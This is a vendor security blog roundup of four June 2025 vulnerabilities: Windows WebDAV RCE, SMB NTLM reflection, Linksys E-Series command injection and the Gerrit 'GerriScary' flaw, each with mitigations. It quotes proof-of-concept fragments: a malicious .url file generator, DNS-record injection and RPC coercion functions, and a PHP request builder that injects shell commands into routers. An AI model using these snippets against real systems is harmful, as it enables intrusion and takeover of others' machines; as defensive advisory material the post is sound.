Take a Product Tour Request a Demo Cybersecurity Assessment Contact Us

Blogs

The latest cybersecurity trends, best practices, security vulnerabilities, and more

The Bug Report - June 2025 Edition


Figure:

Why am I here?


Welcome to the June 2025 edition of The Bug Report from the Trellix Advanced Research Center, where the only thing hotter than your CPU fan is the vulnerability feed.

As the temperature rises and the air conditioner wheezes in defeat, we’re here to cool you off — not with popsicles, but with patches. From zero-click RCEs to router-resurrecting worms, this month’s bugs are dripping with heatstroke-inducing risk.

So, whether you’re sweating through a SOC shift or pretending your laptop fan is an ocean breeze, pull up a chair, grab a cold drink, and enjoy the air-conditioned breakdown of this month’s most blazing vulnerabilities:

CVE-2025-33053 Microsoft Windows WebDAV, Remote Code Execution

CVE-2025-33073 Microsoft Windows SMB, Improper Access Control

CVE-2025-34037 Linksys E-Series Router, OS Command Injection

CVE-2025-1568 Google Gerrit, Supply Chain Attack

Security’s hot. But you? You’re informed. Let’s get into it.



CVE-2025-33053: WebDAV – When your shortcuts lead to shortcuts you didn't want


What is it?


Ever had a shortcut that took you to the entirely wrong place? Well, CVE-2025-33053 is like that, but instead of landing you in the wrong folder, it lands an attacker on your system with remote code execution. This zero-day vulnerability in Microsoft Windows WebDAV stems from its rather trusting nature when it comes to handling file names and paths.

Discovered by Check Point Research (CPR), this bug was actively exploited in the wild by the Stealth Falcon APT group. The attack leveraged a seemingly innocuous .url file that, when clicked (or even previewed!), would trick legitimate Windows tools like iediagcmd.exe into loading malicious executables from an attacker-controlled WebDAV server. This happens because these tools, when spawning auxiliary processes, prioritize executables in their current working directory. The .url file, in its deceit, changes this working directory to the attacker's server, leading to the execution of their malicious route.exe (which is actually a sophisticated loader). Think of it as a Trojan horse, but the horse is a URL, and the gate is Windows' default file handling.

Figure:
WebDAV + url shortcut? Face-plant into RCE


Who cares?


If you're running any version of Microsoft Windows, you should care. This vulnerability was actively exploited by a serious APT group, Stealth Falcon (also known as FruityArmor), known for cyber espionage since at least 2012. Their targets? High-profile government and defense organizations across the Middle East and Africa, specifically observed in Türkiye, Qatar, Egypt, and Yemen. They're not just messing around; they're deploying custom implants like the "Horus Agent" (named after the Egyptian sky god, because, why not be thematic with your malware?). These implants are packed with anti-analysis and anti-detection measures, including commercial code virtualizers and custom obfuscation. They even use "IPfuscation" – converting IPv6 addresses into payloads, which is a surprisingly clever way to hide their tracks. If these folks are interested in your organization, this vulnerability was their golden ticket.

The publicly available proof of concept (PoC) for CVE-2025-33053 demonstrates how straightforward it is to craft a malicious .url file and set up a WebDAV server to serve the payload. The gen_url.py script creates the .url file with the critical WorkingDirectory parameter pointing to the attacker's controlled WebDAV server:

Python
def generate_url_file(output_file, url_target, working_directory, icon_file, icon_index, modified):
    content = f"""[InternetShortcut]
URL={url_target}
WorkingDirectory={working_directory}
ShowCommand=7
IconIndex={icon_index}
IconFile={icon_file}
Modified={modified}
"""
     with open
(output_file, "w", encoding="utf-8") as f:
        f.write(content)

The WebDAVHandler in another PoC sets up a server that responds to OPTIONS and PROPFIND requests, indicating its readiness to serve files from the attacker's directory. This mimics a legitimate WebDAV share, making the attack seamless to the victim's machine.


What can I do?


  • First and foremost, apply the latest security patches released by Microsoft as part of their June 10, 2025, Patch Tuesday updates. This is the official fix, and it's absolutely crucial.
  • Beyond patching, be incredibly wary of .url files, especially those received via email or from untrusted sources.
  • Train your users to be suspicious of any unexpected attachments or links, even if they seem to come from a legitimate sender. Given Stealth Falcon's penchant for spear-phishing and LOLBins (Living Off the Land Binaries), a strong defense-in-depth strategy is your best bet. Fun fact, this exploit can even bypass default sandboxing setups. So no, your “security by obscurity” isn’t going to cut it here.

Trellix Customers: Trellix Network Security (NX) contains coverage for this vulnerability. Ensure that your solution has the latest updates.



CVE-2025-33073 – The SMB loopback of doom


What is it?


What happens when Windows SMB, DNS spoofing, and NTLM reflection meet in a dark alley? You get CVE-2025-33073, a privilege escalation flaw that turns authenticated users into SYSTEM — no malware required.

Researchers discovered that by injecting a malicious DNS record and coercing a victim machine to authenticate over SMB, they could trick the system into thinking it was authenticating to itself. That triggers Windows' “local trust” logic and hands over the golden ticket: SYSTEM privileges.

The core issue lies in how lsass.exe misidentifies marshaled DNS targets as localhost — bypassing NTLM reflection protections that were supposed to be airtight since 2019.

Figure:
Me: I trust localhost —-- Also me: an attacker with a spoofed DNS record


Who cares?


Anyone running Windows in an Active Directory environment that isn't religiously enforcing SMB signing. This is a big deal because it demonstrates a novel way to bypass existing NTLM reflection defenses and, for the first time, shows how Kerberos can be susceptible to similar attacks when combined with this marshaled target information trick. While not yet exploited in the wild, a publicly available PoC exists, meaning it's only a matter of time before it's weaponized. If you have any Domain Controllers or critical servers that don't enforce SMB signing, you're essentially leaving your front door wide open for an attacker to walk in with SYSTEM privileges.

The provided PoCs for CVE-2025-33073 outline a multi-stage attack. The first crucial step involves injecting a malicious DNS A record (e.g., localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA) into the victim's DNS server using dnstool.py or samba-tool:

Python def inject_dns_record(dns_ip, dc_fqdn, record_name, attacker_ip):
    print("[*] Injecting DNS record via samba-tool (requires admin privileges)...")
    cmd = [
        "samba-tool", "dns", "add", dns_ip, dc_fqdn,
        record_name, "A", attacker_ip, "--username=Administrator", "--password=YourPassword"
    ]
    try:
        subprocess.run(cmd, check=True)
        print("[+] DNS record successfully added.")
    except subprocess.CalledProcessError:
        print("[!] Failed to add DNS record. Check credentials and connectivity.")
        sys.exit(1)

Once the DNS record is live, an impacket-ntlmrelayx listener is started by the attacker. Finally, a coercion technique (like PetitPotam leveraging MS-RPRN RPC calls) is used to force the victim machine to authenticate to the attacker's relay server, using the specially crafted DNS record:

def trigger_coercion(victim_ip, fake_host):
    print("[*] Triggering victim to authenticate via MS-RPRN RPC coercion...")
    cmd = [
        "rpcping",
        "-t", f"ncacn_np:{victim_ip}[\\pipe\\spoolss]",
        "-s", fake_host,
        "-e", "1234",
        "-a", "n",
        "-u", "none",
        "-p", "none"
    ]
    try:
        subprocess.run(cmd, check=True)
        print("[+] Coercion RPC call sent successfully.")
    except subprocess.CalledProcessError:
        print("[!] RPC coercion failed. Verify victim connectivity and service status.")
        sys.exit(1)

This chain ultimately tricks the victim's lsass.exe into relaying SYSTEM credentials to the attacker.


What can I do?


The most immediate and effective action is to apply the security updates provided by Microsoft for CVE-2025-33073.

Beyond patching, enforce SMB signing across all your Windows clients and servers. This isn't just a workaround; it's a critical security control that directly prevents NTLM reflection attacks, including this one. SMB signing ensures the integrity and authenticity of your SMB communications, making it much harder for attackers to intercept and relay credentials. If you haven't done it yet, now is the time to prioritize SMB signing.


CVE-2025-34037: Linksys E-Series, back from the dead


What is it?


This one is a nightmare for anyone still clinging to an older Linksys E-Series router. CVE-2025-34037 is a critical OS command injection vulnerability affecting the /tmUnblock.cgi and /hndUnblock.cgi endpoints over HTTP port 8080. What makes it so nasty? It's unauthenticated, zero-click, and has a perfect CVSS score of 10.0. This means an attacker can just... do it. No credentials, no user interaction required.

Who’s making use of this? Say hello (again) to TheMoon worm — a self-propagating malware strain that’s using this bug to enslave routers and scan the internet for new victims. The worm literally just asks the router for its model and firmware, and if it's vulnerable, it sends a command injection to download its main 2MB ELF MIPS binary. Once on the router, it starts scanning the internet for other vulnerable devices, temporarily spinning up its own HTTP server to spread. It's like a digital zombie apocalypse for routers.


Who cares?


If you own or manage any of the confirmed vulnerable Linksys E-Series models (E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, and E900), or other WAG, WAP, WES, WET, and WRT-series routers and Wireless-N devices, you should be very concerned. "TheMoon" worm is out there, actively turning these routers into botnet zombies, scanning and spreading to others. While it's currently a worm, the presence of C2 channels in the binary hints at a potential evolution into something more malicious. This isn't just about your home network; these compromised routers can be used as jumping-off points for broader attacks.

The PHP PoC for CVE-2025-34037 vividly illustrates the command injection. The core of the exploit lies in crafting a POST request to the /tmUnblock.cgi or /hndUnblock.cgi endpoint, specifically manipulating the ttcp_ip parameter to inject shell commands:

PHP function build_packet($host, $port, $vuln, $payload) {
    $exploit = full_urlencode(
        "submit_button=&".
        "change_action=&".
        "submit_type=&".
        "action=&".
        "commit=0&".
        "ttcp_num=2&".
        "ttcp_size=2&".
        "ttcp_ip=-h `".$payload."`&".
        "StartEPI=1"
    );
    $packet  =
        "POST /".$vuln." HTTP/1.1\r\n".
        "Host: ".$host."\r\n".
        // this username:password is never checked ;)
        "Authorization: Basic ".base64_encode("admin:ThisCanBeAnything")."\r\n".
        "Content-Type: application/x-www-form-urlencoded\r\n".
        "Content-Length: ".strlen($exploit)."\r\n".
        "\r\n".
        $exploit;
    return $packet;
}

The full_urlencode function ensures proper encoding of the injected shell commands. The PoC then demonstrates a staged payload delivery, writing the MIPS shellcode in 20-byte chunks to /tmp/c0d3z on the router using echo -en commands, then making it executable with chmod, and finally executing it to gain a bind shell.

Figure:
Rising again, the E1200 router, last updated….2013


What can I do?


  • Replace your affected Linksys E-Series router with a newer, supported device that receives security updates. Many of these models are end-of-life and will never receive a patch.
  • If immediate replacement isn't possible, immediately disconnect the vulnerable router from the internet.
  • Disable remote management, especially on port 8080.
  • Monitor your network for heavy outbound scanning on ports 80 and 8080, and inbound connection attempts to miscellaneous ports below 1024, as these are strong indicators of compromise by "TheMoon" worm.

CVE-2025-1568: Google Gerrit – The supply chain's scary surprise


What is it?


You know it’s bad when the vulnerability has its own nickname. CVE-2025-1568, aka GerriScary, is a supply chain attack that targeted Google’s Gerrit-based code repositories — including high-profile projects like ChromiumOS, Dart, and Bazel.

The bug was less about code flaws and more about misconfigured permissions, label logic, and a juicy race condition. Any registered user (yes, just sign up!) could:

  1. Spot a code change that was already approved.
  2. Leveraging the "addPatchSet" permission, push a malicious patch set to that same change.
  3. Rely on flawed “copy conditions” to keep the previous approvals.
  4. Beat the bot that auto-merges the change.

Boom. Your malware just got merged into Google’s open-source repo. No alert. No re-review. Welcome to the no-click supply chain compromise.

Figure:
Saw 'Commit-Queue +2' and asked no further questions.


Who cares?


This is one of the most dangerous and creative bugs we’ve seen — a real-world compromise of developer trust, CI/CD integrity, and open-source processes. It’s a vulnerability in how teams think, not just how systems work.

It’s like finding out your intern has commit access to Chromium. Oh wait — it’s worse. It’s like anyone on the internet being able to impersonate your intern.

The Tenable Cloud Research team proved the impact by demonstrating code injection into ChromiumOS. While a full-fledged PoC for the race condition was not released to avoid disruption, the research clearly outlines the three components that enable GerriScary: the default addPatchSet permission for registered users, the unsafe label's Copy Conditions logic allowing approvals to carry over, and the exploitable race window between a Commit-Queue +2 vote and the automated bot's merge operation. The ability to dynamically scan Google's Gerrit projects by fingerprinting the addPatchSet permission with a "209" status code response without disrupting services further highlights the ease of identifying vulnerable targets.


What can I do?


Google has already remediated its affected projects by revoking the "addPatchSet" permission for regular users and updating Gerrit to revalidate patches even after approval. If your organization uses Gerrit, you need to follow suit:

  • Apply patches and configuration changes: Ensure your Gerrit instances are updated to the latest secure versions. Critically review and correct "Copy Conditions" configurations to prevent label scores from carrying over to new patch sets without re-evaluation.
  • Restrict "addPatchSet" Permission: Limit the "addPatchSet" permission to only highly trusted and necessary accounts. This significantly reduces the attack surface.
  • Implement Post-Approval Validation: This is key. Put in place mechanisms to revalidate patches even after initial approval before they are merged. This could involve additional automated checks, mandatory manual re-reviews for subsequent patch sets, or stricter approval flows.
  • Harden "Copy Conditions" Logic: Thoroughly review and test your "Copy Conditions" rules. Ensure they are designed to explicitly invalidate or reset critical label scores (like "Code-Review" or custom "Commit-Queue" labels) when new patch sets are introduced, forcing a fresh review.

This GerriScary case is a wake-up call to look beyond traditional code vulnerabilities and scrutinize the underlying permissions and logic of your development pipeline.

Discover the latest cybersecurity research from the Trellix Advanced Research Center: https://www.trellix.com/advanced-research-center/

This document and the information contained herein describes computer security research for educational purposes only and the convenience of Trellix customers.

Get the latest

Stay up to date with the latest cybersecurity trends, best practices, security vulnerabilities, and so much more.
Please enter a valid email address.

Zero spam. Unsubscribe at any time.